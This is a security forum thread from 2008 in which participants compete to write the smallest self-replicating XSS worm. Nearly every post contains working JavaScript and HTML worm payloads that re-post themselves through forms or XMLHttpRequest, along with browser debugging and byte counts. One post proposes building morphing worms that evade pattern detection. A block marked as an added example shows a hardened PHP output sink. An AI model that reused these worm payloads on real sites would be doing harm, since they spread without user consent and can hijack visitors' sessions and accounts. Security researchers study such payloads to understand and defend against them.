Sla.ckers.org
Re: Diminutive XSS Worm Replication Contest
Posted by: ritz
Date: January 04, 2008 08:28PM

nice one!

but firefox 1.5.x says "z is not defined"? i assume it does work in FF2.0 ?

i'm off to sleep, i'll try and continue playing later this week :)

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 04, 2008 08:33PM

http://www.sirdarckcat.net/post.html

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Diminutive XSS Worm Replication Contest
Posted by: bwb labs
Date: January 04, 2008 08:43PM

Quote
.mario
(...)I expect you to recognize the error in a second(...)
p="alert('XSS');x=/*@cc_on!@*/1?new XMLHttpsRequest:new ActiveXObjekt('Microsoft.XMLHTTP');x.open('post','post.php');x.setRequestHeader('content-type','application/x-www-form-urlencoded');x.send('content=p=\"'+p+'\";'+p);if(!i){e(p);i=1}";
e=eval;e(p)
The only web 2.0 trial, what's wrong:
-XMLHttpsRequest->XMLHttpRequest (where/for whom have you been coding ;-)
-ActiveXObjekt->ActiveXObject (not needed, and neither is the /*@cc_on!@*/)
-x.send('content=p=\"'+p+'\";'+p); p twice!, \" gets lost after the first decoding, p is not encoded!, doesn't include script tags & eval(p)! (I know there is e(p), but e is undefined if posted & it's just a string that's never evaluated).
-if(!i){e(p);i=1} e is undefined if posted (will only stop the script from running twice on the same page).
Note: you didn't include the <script></script> tags, which counts and will be needed ...

Quote
.mario
that makes sure it won't loop on the first site it's executed
Good point! Because all implementations with <form> postings might loop on the form page, replicating themselves indefinitely ...
That's why an XMLHttpRequest is nice, it only gets the page once and doesn't loop (other tricks/methods might work too).

My current (working) implementation with XMLHttpRequest:
<script>eval(y="alert('XSS');q=String.fromCharCode(34);(x=new XMLHttpRequest()).open('POST','post.php');x.send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))")</script>
(without setting the content-type, is this really needed when properly encoded?)
Nice features:
- 100% stable replication on FF2/IE7
- only runs once
- pure JavaScript, no crappy HTML or DOM knowledge etc...

Crap:
- 193 bytes
- q=String.fromCharCode(34); it is needed since any \" escaped encoding won't propagate itself right
- encodeURIComponent() only method that seems to do the job right (escape & encodeURI won't)

Re: Diminutive XSS Worm Replication Contest
Posted by: ritz
Date: January 04, 2008 08:43PM

hmmm that's very odd

it only seems to work when i inject it just the way you did it:

<html><body>
<form id=z><INPUT name="content"><SCRIPT>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML.substr(0,148)))</SCRIPT>

whereas when i inject it in a complete HTML page, it says "z is not defined" ..

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
	"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
  <title>blah</title>
</head>

<body>

<div id="container">

<form id=z><INPUT name="content"><SCRIPT>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML.substr(0,148)))</SCRIPT>

  </div>

</body>
</html>

some kind of DOCTYPE compatibility switching going on here? i thought IE was the only browser that did that.

(btw this is the standard DOCTYPE i always copy from quirksmode.org, for me it's the one that has least browser incompatibilities when coding CSS)

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 04, 2008 08:54PM

well, the <div id=z> generates a warning on firefox, but still executes.. since it's not standard..

anyway, it should work on most sites..


Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 04, 2008 09:16PM

@bwb labs: exactly: But I am surprised that the XHR in the reduced version runs on IE7 - this means we can consider this string as a good basis for a version shorter than 140 bytes (currently 111 bytes):

p="alert('XSS');x=new XMLHttpRequest;x.open('post','post.php');x.send('content=p=\"'+p+'\";');eval(p)";eval(p);

Re: Diminutive XSS Worm Replication Contest
Posted by: bwb labs
Date: January 04, 2008 09:50PM

@.mario: you've stripped all the crap :-), but that introduces all the problems again ...
Note that eval(p="") is 2 bytes more efficient than p="";eval(p); it will add up, since you need it twice.

Alternative to eval, I tried some other method (not fully tested on IE7):
<script>f=function(){alert("XSS");(x=new XMLHttpRequest).open("post","post.php");x.send("content="+encodeURIComponent("<script>f="+f+";f()</sc"+"ript>"));};f()</script>
Nice features:
- only runs once
- pure JavaScript, no evil eval, no crappy HTML or DOM knowledge etc...
- no \" encoding crap
- 168 bytes

Crap:
- dubious function.toString() :-)
- bloat (space/tab/newline) in source!!! (and ' gets converted to ", and an extra ; is added)
- cannot reference f inside f: f=function(){reference to f}();
- still: encodeURIComponent() only method that seems to do the job right (escape & encodeURI won't)

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 04, 2008 09:51PM

@ bwb labs and mario:

the content-type is required on ff and ie, and everywhere


Re: Diminutive XSS Worm Replication Contest
Posted by: bwb labs
Date: January 04, 2008 10:06PM

@sirdarckcat: is it really needed? Is it clientside or serverside dependent?
Quote
W3C XMLHttpRequest.send(data) specs (http://www.w3.org/TR/XMLHttpRequest/#send)
Authors are strongly encouraged to ensure that they have specified the Content-Type header via setRequestHeader() before invoking send() with a non-null data argument.

Re: Diminutive XSS Worm Replication Contest
Posted by: digi7al64
Date: January 05, 2008 12:22AM

@sirdarckcat - in my testing i could remove the " around the content name, reducing the size by 2 bytes. Same goes for the non-portable version.

<form id=z><INPUT name=content><SCRIPT>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML.substr(0,146)))</SCRIPT>

157 bytes

btw: I will be very interested to see if someone can beat your solution.

@rsnake - perhaps after this we could look at a competition to create morphing worm code so it can't be so easily detected via pattern matching.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 1 time(s). Last edit at 01/05/2008 12:50AM by digi7al64.

Re: Diminutive XSS Worm Replication Contest
Posted by: bwb labs
Date: January 05, 2008 01:55AM

Quote
digi7al64
in my testing i could remove the " around the content name
And what happened after one FF run? Due to innerHTML & FF HTML fixing, the quotes on name="content" are put back on; that was the discussion for a few posts ... Please test all code before making statements.. (ok, I still have to do some testing with the Content-Type stuff ;-)

Re: Diminutive XSS Worm Replication Contest
Posted by: Spikeman
Date: January 05, 2008 03:28AM

Two questions:

1) It doesn't have to be transparent does it?
2) Does the length of the replicated worm matter? (Does it have to submit the same thing every time?)

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 05, 2008 03:41AM

So here is the smallest I came up with given the fact that some things have to be met, but so do all the other vectors. I assume the form is already in a document where the XSS hole resides, this means most attributes are already set. So, I guess we only have to replicate the full page to let it become a worm.

<script>f.content.value=document.body.innerHTML+alert("xss");f.submit();</script>

It might need to be encoded properly which makes it slightly bigger. Anyway, this does replicate itself to infinity.

btw:

But, sorry to say, I find the rules a bit confusing, because there are so many variables that can make all vectors posted here useless (like magic quotes for instance), and whether it has to just replicate its data or just change its location back to where it came from (same results you see), and what the form looks like: does it have attributes to select upon or not? where it should be injected etc etc.

Re: Diminutive XSS Worm Replication Contest
Posted by: Spikeman
Date: January 05, 2008 04:23AM

143 bytes:

<form id=z><input name=content><script>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML))</script>

Tested in Firefox and IE, quotes are added to make name="content" second time and after. It worked fine with content around it in my tests so the substring was unnecessary.

Edit: I guess the added quotes make this technically 145 but that's still the smallest, no?



Edited 1 time(s). Last edit at 01/05/2008 04:29AM by Spikeman.

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 05, 2008 04:34AM

<form><input name=content type=image onerror="f=this.form;i=f.innerHTML.replace(/(.*)/,'<form>$1</form>');this.type='hidden';alert('XSS');f.action='post.php';f.method='post';f.content.value=escape(i);submit()" src=></form>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 05, 2008 06:13AM

*cough*

Mine is still the smallest. 80 chars.
82 chars with an injection point (">).

Here is the full code I tested:


Diminutive XSS Worm
(">)<script>f.content.value=document.body.innerHTML+alert('xss');f.submit();</script>

form file to inject & replicate:
<html>
<body><form name="f" action="post.php" method="post"><input name="content" /></form></body>
</html>


file to send to: post.php
<?php
echo $_REQUEST['content'];
?>

Extra
If we don't know the form names or fields and we don't care about length but about universal usage, this could help make it more cool:
x=document.forms[0];for(i=0;i<x.elements.length;++i){x.elements[i].value=escape(document.body.innerHTML+alert('xss'));}x.submit();


can it be any smaller? ^^

Re: Diminutive XSS Worm Replication Contest
Posted by: ritz
Date: January 05, 2008 06:44AM

sirdarckcat Wrote:
-------------------------------------------------------
> well, the <div id=z> generates a warning on firefox, but
> still executes.. since it's not standard..

maybe you misunderstood what i tried to say. i don't mean a warning, it says "z is not defined", that's not a warning, it's an error message telling that the variable 'z' does not appear within the scope.

> anyway, it should work on most sites..

i ran a few more tests with your entry and it appears that the thing that is going wrong is that i have always been testing the injected code in an HTML environment with a proper DOCTYPE set.

if i remove the DOCTYPE, it works, if i enter the DOCTYPE it stops working.

now rsnake didn't state anything about DOCTYPE in the rules, so on that account i say it's still valid for the contest, but i don't think it will "work on most sites".

either way it's kind of academic, because in a real-world situation you can use prior knowledge (if you're lucky they even include prototype.js or some such library for you ;-) ), easily allowing for much, much smaller injection-strings.

@Spikeman: as far as i can gather from the rules
1) it doesn't matter if the user sees what is going on
2) every generation of the worm needs to be identical (or, the largest version of its code counts)

@ronald: afaik, the rules state you may assume the script will unescape quotes etc. properly on injection, so that's okay.
but it also says you may NOT assume any knowledge of the DOM tree. meaning, you gotta build the form yourself, as you cannot assume that any form is already there.

@Gareth: you can leave out the this inside an inline event handler, as this is the implied local scope anyway.

btw .. can anyone tell me if it's easy to get IE7 running via wine on ubuntu? cause it's kinda hard to keep competing if i can't test my entries myself ;-)

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 05, 2008 06:45AM

Hmmmm - to be honest I am a little bit tired of the vector assembly right now. I saw tons of great stuff, I am confused by the rules or at least the interpretation of them and nevertheless I learnt a lot of tricks I didn't know before so... have fun guys and congrats in advance to the winner ;)

Greetings,
.mario

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 05, 2008 07:40AM

Heh this is fun :)

167 chars I don't think I can make it smaller damn
<form><input name=content type=image onerror="f=form;i=f.innerHTML;type='hidden';alert('XSS');f.action=(f.method='post')+'.php';value=escape('<form>'+i);submit()" src>

The code has to be decoded correctly, e.g. + is + not space

<?php
$content = $_POST['content'];
if($content) {
echo urldecode(str_replace("+", "%2B",$content));
exit;
}
?>




Edited 1 time(s). Last edit at 01/05/2008 07:41AM by Gareth Heyes.
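A hardened form of the contest's post.php sink, added here as an example and not code from the thread: it reads the field from the POST body only, leaves decoding to PHP, and HTML-encodes on output so a posted payload is displayed as text instead of being parsed. The size limit $maxLen is an assumed value.

```php
<?php
// Added example (not from the thread): hardened variant of the contest's post.php.
// The thread's sink echoes $_REQUEST['content'] raw, so whatever is posted is
// rendered as markup; that is the stored-XSS sink every entry in this thread relies on.

// Assumed limit for the field; use whatever the application actually needs.
$maxLen = 4096;

header('Content-Type: text/html; charset=UTF-8');
header('X-Content-Type-Options: nosniff');

// Accept the field from the POST body only. $_REQUEST also merges GET and cookie
// data, which would make the same sink reachable through a plain link.
if ($_SERVER['REQUEST_METHOD'] !== 'POST' || !isset($_POST['content'])) {
    http_response_code(405);
    exit;
}

// PHP has already decoded the application/x-www-form-urlencoded body into $_POST
// ('+' became a space, '%2B' became '+'). Calling urldecode() on it again, as the
// decoder above does, double-decodes and lets a literal "%3C" turn into "<".
$content = $_POST['content'];
if (!is_string($content) || strlen($content) > $maxLen) {
    http_response_code(400);
    exit;
}

// Encode on output rather than "cleaning" on input: '<', '>', '&', '"' and "'" all
// become entities, so a posted <script> block is shown, never executed. ENT_QUOTES
// covers both quote styles; the explicit charset avoids multibyte encoding tricks.
echo '<pre>' . htmlspecialchars($content, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</pre>';
```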

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 05, 2008 07:57AM

Ok here ya have ya form then:

<form name=content><marquee onstart="content.value=document.body.innerHTML+alert('xss');content.submit();">
or:
<form name="i"><input name="content"><marquee onstart="content.value=document.body.innerHTML+alert('xss');i.submit();">

lol msie of course!

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 05, 2008 08:02AM

Got my other down to 164 chars, I haven't got IE handy to test but I think it should work on FF + IE

<form><input name=content type=image onerror="with(form)action=(method='post')+'.php',i=escape('<form>'+innerHTML);value=i;type='hidden';alert('XSS');submit()" src>


Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 05, 2008 08:11AM

@Ronald: marquee fires an onstart in IE??? Hehe - that's damn cool ;)

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 05, 2008 08:11AM

full form: 139 chars

<form method=post action=post.php name=i><input name=content><script>content.value=document.body.innerHTML+alert('xss');i.submit();</script>

without form: 80 chars complete if form is already in the page:

<script>f.content.value=document.body.innerHTML+alert('xss');f.submit();</script>

That's it, I go for lunch see ya later.

Re: Diminutive XSS Worm Replication Contest
Posted by: ritz
Date: January 05, 2008 08:26AM

@Ronald, i didn't check it, but it seems like your code submits the entire innerHTML of the body element, not just the worm code?

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 05, 2008 08:30AM

This is self replicating and should be identical:-

<script>(function(){alert('XSS');with(document)write('<form method=post action=post.php><input value='+escape('<script>('+arguments.callee+')()</scr'+'ipt>')+' name=content>'),forms[0].submit()})()</script>

Should work in IE as well

206 chars


Re: Diminutive XSS Worm Replication Contest
Posted by: Alex
Date: January 05, 2008 08:36AM

EDIT: Removed 'cause onmouseover is not allowed.

@.mario: onstart is described with the marquee-example in the XSS-cheat sheet.

BTW: Why is <marquee> only working with JS enabled in FF ?



Edited 1 time(s). Last edit at 01/07/2008 02:10PM by Alex.

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 05, 2008 08:43AM

Slight variation which auto submits the form with a input image:-
<script>(function(){alert('XSS');document.write('<form method=post action=post.php><input type=image onerror="form.submit()" src><input value='+escape('<script>('+arguments.callee+')()</scr'+'ipt>')+' name=content>')})()</script>


Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 05, 2008 08:54AM

@Alex: Ah - didn't have that in mind. Marquee isn't a W3C compliant tag and the Gecko team decided some time ago that it could be emulated - but they didn't build in native support so it requires JS/XBL.

http://developer.mozilla.org/en/docs/HTML:Element:marquee



Edited 1 time(s). Last edit at 01/05/2008 08:55AM by .mario.

Re: Diminutive XSS Worm Replication Contest
Posted by: Alex
Date: January 05, 2008 09:06AM

Hmm, I think I've made a mistake. I hadn't tested Ronald's code before. I just changed onstart to onmouseover and added A at the end.
As I can read in the specs from Mozilla about marquee, it supports the event handler onstart also. But this doesn't work for me. So I thought that this is the reason why Ronald said that his code is only working in IE. Well, so my code won't fix that. Always test before posting. ;)

---
~~Patching is for suckers~~

http://www.bitsploit.de



Edited 1 time(s). Last edit at 01/07/2008 02:09PM by Alex.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 05, 2008 09:44AM

@ritz

My code replicates everything between the <body></body> including the JS itself.
I figured worms need a new instance to propagate further, not only the payload because that would be simply useless and not a real worm so to speak.

But you can only submit the JS through it in the same way, doesn't impact it actually.
